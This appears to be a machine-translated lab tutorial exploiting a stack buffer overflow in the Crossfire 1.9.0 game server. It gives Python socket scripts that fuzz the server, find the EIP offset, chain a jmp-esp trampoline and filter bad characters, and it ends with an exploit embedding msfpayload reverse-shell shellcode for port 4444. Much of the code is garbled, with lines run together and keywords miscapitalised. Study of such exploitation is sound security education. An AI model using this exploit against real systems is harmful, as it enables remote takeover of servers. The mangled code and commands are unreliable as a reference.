What is a buffer overflow?
Trained, or learned the Assembly should know that when the buffer boundary limit is not strict, because the variable passed into the malformed data or program run error, causing the buffer to "burst", thus covering the adjacent memory area of the data
Successful modification of memory data can result in process hijacking, executing malicious code, gaining control of the server, etc.
Crossfire
- Multiplayer Online RPG game
- Buffer Overflow vulnerability when 1.9.0 version accepts inbound socket connections (server side)
Debugging Tools
Operating Platform
- Kali 2.0 x64 Virtual machine
Memory protection mechanism in Linux
- Dep
- ASLR
- Stack cookies
- Stack smash
The vulnerability is too old to avoid the test in which our VMS are hijacked and can be set through the Iptables destination port only allowing local access if the network is only host can omit
127.0.0.1-127.0. 0.1-j DROP
Create the/usr/games/directory and extract the crossfire1.9.0 server to the directory
#解压 Touch /usr/games//usr/games/tar zxpf Crossfire. Tar . GZ
Run the crossfire to see if there is a problem./crossfire
Waiting for connections appears, there is a problem to see error
--run/usr/games/crossfire/bin/crossfire
The lower right corner is the paused paused state
Menu bar Debug + Run (F9) Click Two back to run up
You can view the program port information by command
-pantu | grep 13327
The address of the next instruction is stored in the EIP
This program is different from the general overflow, it must send a fixed amount of data before overflow can occur, rather than a certain amount of data can be, we construct the following Python program test
#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash="\x41"* 4379## \x41 is a 16-input uppercase aBuffer ="\x11 (Setup Sound"+ Crash +"\x90\x00#" ## \x90 is null,\x00 is a null characters =Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"
After running, EDB error is as follows
This means that the EIP (the address where the command is stored) has been overwritten with the address in boldface, and the computer cannot find the address. This address is the one we entered, indicating that the EIP is controllable and there is overflow.
Here you can also test the addition of a or reduce a send, you will find that the back of the two values are not a, are not controllable, that is, the data amount is only 4379 when the EIP is fully controllable
To see exactly which location A is the EIP address after overflow, the tool generates a unique string
cd/usr/share/metasploit-framework/tools/exploit/. 4379
Copy down and construct the following Python script
#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash="Unique String"Buffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"
Open the EDB launcher and run the Python program
Using the tool to confirm the position of the string
cd/usr/share/metasploit-framework/tools/exploit/. 46367046
This means that the EIP address has 4,368 characters in front of it. The location of the 4369,4370,4371,4372 is the EIP address after overflow
We construct the following Python script validation
#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash='A'*4368 +'B'+'C'*7 # # 4,379 charactersBuffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"
You can see that the EIP address is filled with the exact B character.
Right-click ESP, select Follow in Dump to view the data
Because it must be an exact character to overflow, the ESP register can only hold 7 characters and obviously cannot be stored shellcode
After a few registers are viewed, EAX is selected. Because EAX storage is the thousands of a that we sent previously, is controllable, and has enough size to store shellcode
The idea is to let the EIP store eax address, and then add 12 to the address, directly from the position of the first a to start execution. But each machine's EAX address is also different, does not have the universality, therefore direct jumps the idea to abandon.
Since ESP can hold 7 characters, think of jump eax and offset 12
Construct the following Python code to run
#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash='A'*4368 +'B'+'\x83\xc0\x0c\xff\xe0\x90\x90'Buffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"
First the EIP address is still accurate four B
ESP = follow in Dump view
C0 0c FF E0 90 90 Description It is also perfectly written here
The idea is the EIP + ESP = eax,eax store Shellcode, because the ESP address is not fixed, you need to use a fixed address to jump
Open EDB, menu bar Plugins = Opcodesearcher = Opcodesearch
Choose the Crossfire program, ESP----EIP, choose the address of a jmp ESP, this address will not change
menu Bar plugin = Breakpointmanager + Breakpoints Select Add to add a breakpoint for the address selected above to test.
Then we test the bad character, after the bad character is tested \x00\x0a\x0d\x20
Generate Shellcode and filter bad characters
cd/usr/share/framework2/. /msfpayload-L #可以生成的shellcode的种类. /msfpayload linux_ia32_reverse lhost=127.0. 0.1 lport=4444"\x00\x0a\x0d\x20"
Build a Python script
#!/usr/bin/pythonImportSockethost="127.0.0.1"Shellcode= ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+"\X16\XB8\XB8\X9E\XEB\X15\X55\X23\X65\X78\X19\X45\XB8\XFA"+"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+"\x1a\x99\x43\x71\x97\x54\x03") Crash= Shellcode +"A"* (4368-105) +"\x97\x45\x13\x08"+"\x83\xc0\x0c\xff\xe0\x90\x90"Buffer="\x11 (Setup Sound"+crash+"\x90\x90#)"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"
Listen to the local 4444 port to get a shell
Simple buffer overflow under Linux